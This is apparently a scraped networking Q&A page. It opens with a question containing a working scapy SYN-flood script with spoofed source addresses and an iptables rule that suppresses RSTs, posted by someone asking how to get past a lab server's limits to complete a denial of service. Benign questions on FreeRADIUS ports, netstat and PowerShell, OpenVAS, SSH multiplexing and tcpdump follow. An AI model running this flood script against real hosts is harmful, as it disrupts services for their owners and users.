Ubuntu server limits to 5 SYN_RECV - networking

For a school project I'm trying to do a DOS on an Ubuntu server (18.04) using Ubuntu desktop 18.04 with scapy. They are both placed as VM on VirtualBox.
On server side I have a python SimpleHTTPServer on port 80 that is pingable and reachable via browser by the desktop machine.
I'm trying to DoSing it using this code:
#!/usr/bin/env python
import socket, random, sys
from scapy.all import *
def sendSYN(target, port):
#creating packet
# insert IP header fields
tcp = TCP()
ip = IP()
#set source IP as random valid IP
ip.src = "%i.%i.%i.%i" % (random.randint(1,254), random.randint(1,254), random.randint(1,254), random.randint(1,254))
ip.dst = target
# insert TCP header fields
tcp = TCP()
#set source port as random valid port
tcp.sport = random.randint(1,65535)
tcp.dport = port
#set SYN flag
tcp.flags = 'S'
send(ip/tcp)
return ;
#control arguments
if len(sys.argv) != 3:
print("Few argument: %s miss IP or miss PORT" % sys.argv[0])
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
count = 0
print("Launch SYNFLOOD attack at %s:%i with SYN packets." % (target, port))
while 1:
#call SYNFlood attack
sendSYN(target,port)
count += 1
print("Total packets sent: %i" % count)
print("==========================================")
that basically sends an infinite number of SYN requests to the target machine on the user specified port. Its usage is: sudo python pythonDOS.py <target IP> <target port>.
Before launching this I do sudo iptables -A OUTPUT -p tcp -s <attacker IP> RST RST -j DROP on the attacking machine, to prevent the kernel to send RST request.
The attack seems to work: on wireshark on the attacker machine I can see that packets are sent correctly, but the server doesn't go down.
Running a netstat -antp | grep 80 on the target server I obtain this output:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 138.221.76.4:24171 SYN_RECV -
tcp 0 0 192.168.1.51:80 164.253.235.187:64186 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
and if I rerun the command after few seconds:
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 192.168.1.51:80 100.58.218.121:10306 SYN_RECV -
tcp 0 0 192.168.1.51:80 35.206.32.111:50544 SYN_RECV -
tcp 0 0 192.168.1.51:80 47.206.177.213:39759 SYN_RECV -
tcp 0 0 192.168.1.51:80 55.107.244.119:17977 SYN_RECV -
tcp 0 0 192.168.1.51:80 85.158.134.238:37513 SYN_RECV -
it seems that the server can handle a maximum of 5 SYN_RECV although I'm doing hundreds of these requests with the attacker machine, so I think this is why I can't DOS the server. The ufw is disabled. My objective is to disable or understand what's happening on the server and disable it in order to perform the DOS attack.
Any help is appreciated, thanks in advance.
UPDATE: I installed tshark on the target server and from that I can see that all the packets I'm sending are received on the server, so they are no lost in communication between the two virtual machines. Also running netstat -i I can see that there are no RX_DROP.

Related

Freeradius extra open port

I have server with available many subnets, I would like to my Freeradius only listen on specific IP addresses. I use freeradius configuration from Arch package freeradius-3.0.19-3. The only changes are:
removed IPv6 listen sections
in IPv4 listen section I configured listening address to ipaddr="192.168.1.1"
In my configuration I have also listening on 127.0.0.1:18120, but when I check open ports I got:
ss -nlp|grep radiusd
udp UNCONN 0 0 0.0.0.0:40012 0.0.0.0:* users:(("radiusd",pid=22199,fd=9))
udp UNCONN 0 0 127.0.0.1:18120 0.0.0.0:* users:(("radiusd",pid=22199,fd=7))
udp UNCONN 0 0 192.168.1.1:1812 0.0.0.0:* users:(("radiusd",pid=22199,fd=8))
This port 40012 is dynamic allocated after freeradius service restart the number is different.
ss -nlp|grep radiusd
udp UNCONN 0 0 0.0.0.0:42447 0.0.0.0:* users:(("radiusd",pid=26490,fd=9))
udp UNCONN 0 0 127.0.0.1:18120 0.0.0.0:* users:(("radiusd",pid=26490,fd=7))
udp UNCONN 0 0 192.168.1.1:1812 0.0.0.0:* users:(("radiusd",pid=26490,fd=8))
How to get rid of this port? What is a function of it?
This extra port is used for sending and receiving proxy packets. If you are not using proxying you can disable it in radiusd.conf, look for
proxy_requests = yes
$INCLUDE proxy.conf
change it to "no", and comment out the INCLUDE line.
If you want to change the address and/or port that is used, look at the listen sections in e.g. raddb/sites-enabled/default. You can add a new section with type = proxy to specifically set the address and port that is used.

how to check whether a set of 10,000 consecutive ports are open on my pc at localhost?

All in all i want 10000 open ports at localhost and that too consecutive like 55000 to 65000 for my project .I want to be sure that the set(10,000 consecutive ports) of ports are open .
Here i am describing the three categories of ports:-
The Well Known Ports are those from 0 through 1023.
The Registered Ports are those from 1024 through 49151
The Dynamic and/or Private Ports are those from 49152 through 65535
I want to know some cmd command which will solve my purpose.(i am using windows OS).
My System supports netstat but i want some other command or tool to solve my purpose as i find netstat very time consuming and manual way of checking.
Thanks in advance
Actually, Windows does have a netstat which you can process the output of to look for established sessions:
C:\pax> netstat -na
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 10.6.0.127:54140 143.127.136.95:443 ESTABLISHED
TCP 10.6.0.127:54259 192.168.2.47:32308 ESTABLISHED
TCP 10.6.0.127:54263 192.168.2.47:32308 ESTABLISHED
TCP 10.6.0.127:54274 192.168.2.22:50207 ESTABLISHED
TCP 10.6.0.127:54319 192.168.2.40:5061 ESTABLISHED
But I've finally given up on cmd.exe as a scripting language.
You can also use get-nettcpconnection from within Powershell to get similar information:
PS C:\pax> Get-NetTCPConnection
| format-table -autosize
LocalAddress LocalPort RemoteAddress RemotePort State AppliedSetting
------------ --------- ------------- ---------- ----- --------------
:: 54122 :: 0 Listen
:: 54104 :: 0 Listen
:: 49156 :: 0 Listen
:: 445 :: 0 Listen
:: 135 :: 0 Listen
10.6.0.127 56321 10.4.0.96 445 Established Internet
127.0.0.1 56053 127.0.0.1 8085 TimeWait
127.0.0.1 56052 127.0.0.1 8085 TimeWait
10.6.0.127 56046 192.168.2.13 445 Established Internet
127.0.0.1 56043 127.0.0.1 8085 TimeWait
10.6.0.127 56039 192.168.2.13 49814 Established Internet
10.6.0.127 56038 192.168.2.13 135 TimeWait
10.6.0.127 56035 216.58.220.142 443 Established Internet
: : :
The Powershell way is preferred, at least by intelligent people such as I :-) since it has all these fantastic capabilities for filtering and modifying the data:
PS C:\pax> get-nettcpconnection
| where-object {$_.State -eq 'Established'}
| select-object 'LocalPort'
| sort-object 'LocalPort'
| format-table -autosize
LocalPort
---------
23560
49735
49736
54140
54145
54259
54263
: : :
Any more complex processing (like finding 10,000 consecutive connections) can be done in a PS1 script, similar to how it would have been done with CMD files in the past.

Cannot access OpenVAS following installation

I am sure that once I find the issue I am going to feel like a fool, but I have been pouring highlevel debugging into something that I know the answer must be right there.
Same issue on 2 different 'new' CentOS machines, I install OpenVAS, run openvas-check-setup --server a whole bunch of times, follow the instructions till error free, the ports light up but I cannot connect.
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:9390 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:9391 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:9393 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:9329 0.0.0.0:* LISTEN
I see the packets hit the server just fine:
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
10:32:27.119370 IP 10.20.10.47.ds-user > 10.180.10.51.9392: Flags [S], seq 2713892558, win 65535, options [mss 1460,nop,nop,sackOK], length 0
10:32:27.381288 IP 10.20.10.47.ds-mail > 10.180.10.51.9392: Flags [S], seq 2903829103, win 65535, options [mss 1460,nop,nop,sackOK], length 0
But the server never replies:
It's not a firewall:
[root#offtbn ~]# iptables-save
[root#offtbn ~]#
Firewall is empty
I tried all of the OpenVAS ports using http: and https: in every different browser and from multiple machines.
The first OpenVAS server 'did' work for a day, but something changed which is why I built the second machine from scratch. Both have the exact same issue and the exact same symptoms.
/etc/rc.d/init.d/openvas-administrator restart
/etc/rc.d/init.d/openvas-manager restart
/etc/rc.d/init.d/openvas-scanner restart
all run clean
I am really stumped on this one.
the site was having network issues.
From what I could tell, a proxy was breaking headers and somehow this exterior failure was effecting openvas's ability to do a basic login.
Did an install on a different network with the exact same distro and everything went flawless.
Not exactly sure the exact cause.

Parallel commands / file transfer on persistent single ssh connection

I have SSH connection created like:
ssh -MNf -S /tmp/mysocket user#host
And I'm using ssh without password for this session. I want to run multiple parallel commands (for example: 500 parallel commands) on the same connection and i want to copy files at the same time by using this persistent ssh socket,
so i can run commands with:
ssh -S /tmp/mysocket user#host md5sum file102 | cut -d " " -f 1
some times i get "Connection refused" warning but actually command works, i see multiple connections with "netstat -an" I understand that commands are not working on the same connection...
aokan-pc:~ $ netstat -an |grep ESTABLISHED |grep '192.168.1.30:22'
tcp 0 0 192.168.1.29:58568 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:60866 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:60385 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:60368 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:52523 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:42096 192.168.1.30:22 ESTABLISHED
tcp 0 0 192.168.1.29:42177 192.168.1.30:22 ESTABLISHED
1)
Is it possible to run parallel commands on 1 persistent openssh connection? How?
2)
Can I transfer multiple parallel files to the same remote host on 1 persistent ssh connection/socket? And I have to use a checksum system, I tried to use md5sum for checksum controls... (with rsync or with scp (using multiple connections) or with nfs how?)
3)
What are disadvantages of using single socket connection for this job? Instead of using one Should i use thousands of TCP socket connections to the same host?

tcpdump to filter ssl packets

I need to filter out all SSL packets using tcpdump. I know that only the first packet can be recognized as being ssl. Is it possible to match against the first packet and then filter out the rest of the SSL stream?
You can filter a tcp stream in tcpdump too, this site explains how to use tcpdump in this way, I hope it helps: tcpdump.org/tcpdump_man.html
You will have to tweak it a bit, but it should work.
Also, there is a dedicated SSL_DUMP utility
Yes, you can. You can follow the commands below to filter the first packet of SSL traffic,
Method 1
[root#arif]# tcpdump -i eth0 src host 192.168.0.2 and dst host 40.113.200.201 and dst port 443 -c 1
Where,
-i : is to mention the interface
src host : is the ip of your localhost
dst host : is the ip of your destination host
dst port : is the destination port where the SSL service is served. You can change the default (443) port according to your configuration.
-c : is used to exit tcpdump after receiving count packets.
-c flag is the main component of your filtering as this flag tells tcpdump to exit after specific packet count. Here, I have used 1 to exit tcpdump after capturing only one (first) packet.
Method 2
The above solution will only work if you initiate tcpdump every time. If you want to filter out the only first packet of each SSL stream then follow the command bellow,
[root#arif]# tcpdump -li eth0 src host 192.168.0.2 and dst host 40.113.200.201 and port 443 and tcp[13] == 2
Where,
l : "Make stdout line buffered. Useful if you want to see the data while capturing it." This will help you to grep/tee/awk the output.
src host dst host : You might ignore these filtering if you don't want to specify source and destination ip.
tcp[13] == 2 In TCP header octate no. 13 is the octate used for setting flags. To set SYN bit 0 0 0 0 0 0 1 0 combination is used (have a look at the diagram bellow) which is decimal 2. So this will help you to filter only the SYN packets which is the first packet of an SSL stream.
|C|E|U|A|P|R|S|F|
|---------------|
|0 0 0 0 0 0 1 0|
|---------------|
So the above configuration should work for most of the scenerio.

Resources